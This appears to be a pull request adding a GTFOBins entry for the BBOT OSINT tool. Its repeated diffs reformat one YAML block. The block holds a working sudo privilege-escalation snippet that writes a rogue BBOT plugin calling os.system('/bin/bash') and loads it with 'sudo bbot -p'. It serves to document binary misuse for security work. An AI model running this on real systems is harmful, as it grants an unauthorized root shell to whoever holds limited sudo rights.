### PR TITLE
Added the OSINT tool BBOT

### DIFF
--- a/_gtfobins/bbot.md
+++ b/_gtfobins/bbot.md
@@ -1,27 +1,27 @@
 ---
 functions:
   sudo:
-	- description: This command creates a couple of malicious YML config files and BBOT plugins, then inits BBOT and triggers the malicious plugin.
-	  code: |
-		TEMP_YMLCONF=$(mktemp /tmp/XXXXXXXX.yml)
-		TEMP_PLUGINDIR=$(mktemp -d /tmp/XXXXXXXX)
-		TEMP_PLUGIN=$TEMP_PLUGINDIR/init_userbash.py
-		TEMP_OUTDIR=$(mktemp -d /tmp/XXXXXXXX)
-		PLUGIN_NAME=init_userbash
-		cat << EOF > $TEMP_YMLCONF
-		targets: localhost
-        output_dir: $TEMP_OUTDIR
-        module_dirs: $TEMP_PLUGINDIR
-		EOF
-		cat << EOF > $TEMP_PLUGIN
-		import os
-        from bbot.modules.base import BaseModule
-        class init_userbash(BaseModule):
-	        async def setup(self):
-		        self.hugeinfo(f"[*] Starting a new user shell ......")
-		        os.system("/bin/bash")
-		    async def handle_event(self, event):
-		        self.hugeinfo(f"[*] Exiting shell ......")
-		EOF
-		sudo bbot -p $TEMP_YMLCONF -m $PLUGIN_NAME -t localhost
+          - description: This command creates a couple of malicious YML config files and BBOT plugins, then inits BBOT and triggers the malicious plugin.
+          code: |
+                TEMP_YMLCONF=$(mktemp /tmp/XXXXXXXX.yml)
+                TEMP_PLUGINDIR=$(mktemp -d /tmp/XXXXXXXX)
+                TEMP_PLUGIN=$TEMP_PLUGINDIR/init_userbash.py
+                TEMP_OUTDIR=$(mktemp -d /tmp/XXXXXXXX)
+                PLUGIN_NAME=init_userbash
+                cat << EOF > $TEMP_YMLCONF
+                targets: localhost
+                output_dir: $TEMP_OUTDIR
+                module_dirs: $TEMP_PLUGINDIR
+                EOF
+                cat << EOF > $TEMP_PLUGIN
+                import os
+                from bbot.modules.base import BaseModule
+                class init_userbash(BaseModule):
+                    async def setup(self):
+                        self.hugeinfo(f"[*] Starting a new user shell ......")
+                        os.system("/bin/bash")
+                    async def handle_event(self, event):
+                        self.hugeinfo(f"[*] Exiting shell ......")
+                EOF
+                sudo bbot -p $TEMP_YMLCONF -m $PLUGIN_NAME -t localhost
 ---

--- a/_gtfobins/bbot.md
+++ b/_gtfobins/bbot.md
@@ -1,25 +1,25 @@
 ---
 functions:
   sudo:
-          - description: This command creates a couple of malicious YML config files and BBOT plugins, then inits BBOT and triggers the malicious plugin.
-          code: |
-                TEMP_YMLCONF=$(mktemp /tmp/XXXXXXXX.yml)
-                TEMP_PLUGINDIR=$(mktemp -d /tmp/XXXXXXXX)
-                TEMP_PLUGIN=$TEMP_PLUGINDIR/init_userbash.py
-                TEMP_OUTDIR=$(mktemp -d /tmp/XXXXXXXX)
-                PLUGIN_NAME=init_userbash
-                cat << EOF > $TEMP_YMLCONF
-                targets: localhost
-                output_dir: $TEMP_OUTDIR
-                module_dirs: $TEMP_PLUGINDIR
-                EOF
-                cat << EOF > $TEMP_PLUGIN
-                import os
-                from bbot.modules.base import BaseModule
-                class init_userbash(BaseModule):
-                    async def setup(self):
-                        self.hugeinfo(f"[*] Starting a new user shell ......")
-                        os.system("/bin/bash")
+    - description: This command creates a couple of malicious YML config files and BBOT plugins, then inits BBOT and triggers the malicious plugin.
+    code: |
+      TEMP_YMLCONF=$(mktemp /tmp/XXXXXXXX.yml)
+      TEMP_PLUGINDIR=$(mktemp -d /tmp/XXXXXXXX)
+      TEMP_PLUGIN=$TEMP_PLUGINDIR/init_userbash.py
+      TEMP_OUTDIR=$(mktemp -d /tmp/XXXXXXXX)
+      PLUGIN_NAME=init_userbash
+      cat << EOF > $TEMP_YMLCONF
+      targets: localhost
+      output_dir: $TEMP_OUTDIR
+      module_dirs: $TEMP_PLUGINDIR
+      EOF
+      cat << EOF > $TEMP_PLUGIN
+      import os
+      from bbot.modules.base import BaseModule
+      class init_userbash(BaseModule):
+          async def setup(self):
+              self.hugeinfo(f"[*] Starting a new user shell ......")
+              os.system("/bin/bash")
                     async def handle_event(self, event):
                         self.hugeinfo(f"[*] Exiting shell ......")
                 EOF

--- a/_gtfobins/bbot.md
+++ b/_gtfobins/bbot.md
@@ -1,0 +1,27 @@
+---
+functions:
+  sudo:
+	- description: This command creates a couple of malicious YML config files and BBOT plugins, then inits BBOT and triggers the malicious plugin.
+	  code: |
+		TEMP_YMLCONF=$(mktemp /tmp/XXXXXXXX.yml)
+		TEMP_PLUGINDIR=$(mktemp -d /tmp/XXXXXXXX)
+		TEMP_PLUGIN=$TEMP_PLUGINDIR/init_userbash.py
+		TEMP_OUTDIR=$(mktemp -d /tmp/XXXXXXXX)
+		PLUGIN_NAME=init_userbash
+		cat << EOF > $TEMP_YMLCONF
+		targets: localhost
+        output_dir: $TEMP_OUTDIR
+        module_dirs: $TEMP_PLUGINDIR
+		EOF
+		cat << EOF > $TEMP_PLUGIN
+		import os
+        from bbot.modules.base import BaseModule
+        class init_userbash(BaseModule):
+	        async def setup(self):
+		        self.hugeinfo(f"[*] Starting a new user shell ......")
+		        os.system("/bin/bash")
+		    async def handle_event(self, event):
+		        self.hugeinfo(f"[*] Exiting shell ......")
+		EOF
+		sudo bbot -p $TEMP_YMLCONF -m $PLUGIN_NAME -t localhost
+---

--- a/_gtfobins/bbot.md
+++ b/_gtfobins/bbot.md
@@ -2,26 +2,26 @@
 functions:
   sudo:
     - description: This command creates a couple of malicious YML config files and BBOT plugins, then inits BBOT and triggers the malicious plugin.
-    code: |
-      TEMP_YMLCONF=$(mktemp /tmp/XXXXXXXX.yml)
-      TEMP_PLUGINDIR=$(mktemp -d /tmp/XXXXXXXX)
-      TEMP_PLUGIN=$TEMP_PLUGINDIR/init_userbash.py
-      TEMP_OUTDIR=$(mktemp -d /tmp/XXXXXXXX)
-      PLUGIN_NAME=init_userbash
-      cat << EOF > $TEMP_YMLCONF
-      targets: localhost
-      output_dir: $TEMP_OUTDIR
-      module_dirs: $TEMP_PLUGINDIR
-      EOF
-      cat << EOF > $TEMP_PLUGIN
-      import os
-      from bbot.modules.base import BaseModule
-      class init_userbash(BaseModule):
-          async def setup(self):
-              self.hugeinfo(f"[*] Starting a new user shell ......")
-              os.system("/bin/bash")
-                    async def handle_event(self, event):
-                        self.hugeinfo(f"[*] Exiting shell ......")
-                EOF
-                sudo bbot -p $TEMP_YMLCONF -m $PLUGIN_NAME -t localhost
+      code: |
+        TEMP_YMLCONF=$(mktemp /tmp/XXXXXXXX.yml)
+        TEMP_PLUGINDIR=$(mktemp -d /tmp/XXXXXXXX)
+        TEMP_PLUGIN=$TEMP_PLUGINDIR/init_userbash.py
+        TEMP_OUTDIR=$(mktemp -d /tmp/XXXXXXXX)
+        PLUGIN_NAME=init_userbash
+        cat << EOF > $TEMP_YMLCONF
+        targets: localhost
+        output_dir: $TEMP_OUTDIR
+        module_dirs: $TEMP_PLUGINDIR
+        EOF
+        cat << EOF > $TEMP_PLUGIN
+        import os
+        from bbot.modules.base import BaseModule
+        class init_userbash(BaseModule):
+            async def setup(self):
+                self.hugeinfo(f"[*] Starting a new user shell ......")
+                os.system("/bin/bash")
+            async def handle_event(self, event):
+                self.hugeinfo(f"[*] Exiting shell ......")
+        EOF
+        sudo bbot -p $TEMP_YMLCONF -m $PLUGIN_NAME -t localhost
 ---


### PR DESCRIPTION
BBOT is a recursive, modular OSINT framework written in Python. It can execute the entire OSINT process in a single command: subdomain enumeration, port scans, web screenshots, vulnerability scanning, and much more. BBOT has over 80 modules and counting.
BBOT also supports using plugins written by user. Users can use argument `-p` to load a malicious YML preset config file from anyway. In the YML config file, user can specify the directory of malicious BBOT plugins by YML argument `module_dirs`. If a low privilege user could run BBOT with sudo, it will leads to privilege escalation.
